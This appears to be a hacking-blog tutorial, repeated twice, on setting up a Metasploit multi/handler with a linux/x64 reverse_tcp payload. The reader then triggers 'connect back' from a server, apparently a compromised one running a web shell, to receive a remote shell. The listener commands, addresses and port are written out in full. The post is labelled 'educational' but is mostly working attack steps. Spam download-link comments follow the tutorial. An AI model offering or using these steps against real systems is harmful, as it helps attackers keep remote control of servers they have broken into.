Salam Friends
NOTE:- This tutorial is only for educational purpose.
Today i will show you how to back connect with MetasPloit , as i found it better then back connecting with netcat because some server are not connecting with NETCAT while connected with MetasPloit.
i have already forward my port for My Backtrack & it is 3333 in my case.My local IP is 192.168.1.3.
NOTE: if you are on vpn then switch it OFF
Run MetasPloit & give following commands
>use exploit/multi/handler
>set lhost 192.168.1.3
>set lport 3333
Now time is to select payload .. here you have to check your server operation system
like i have linux x86_64 , so i will set this payload
>set payload linux/x64/shell/reverse_tcp
>exploit
Payload handler will b started in your metasploit .
now go to your server side & click connect back with port (3333) with your global Ip
after clicking on connect you will get reverse shell in Metasploit.
Regards
Gujjar(pcp)
NOTE:- This tutorial is only for educational purpose.
Today i will show you how to back connect with MetasPloit , as i found it better then back connecting with netcat because some server are not connecting with NETCAT while connected with MetasPloit.
i have already forward my port for My Backtrack & it is 3333 in my case.My local IP is 192.168.1.3.
NOTE: if you are on vpn then switch it OFF
Run MetasPloit & give following commands
>use exploit/multi/handler
>set lhost 192.168.1.3
>set lport 3333
Now time is to select payload .. here you have to check your server operation system
like i have linux x86_64 , so i will set this payload
>set payload linux/x64/shell/reverse_tcp
>exploit
Payload handler will b started in your metasploit .
now go to your server side & click connect back with port (3333) with your global Ip
after clicking on connect you will get reverse shell in Metasploit.
Regards
Gujjar(pcp)
Facebook >>>>> Download Now
ReplyDelete>>>>> Download Full
Facebook >>>>> Download LINK
>>>>> Download Now
Facebook >>>>> Download Full
>>>>> Download LINK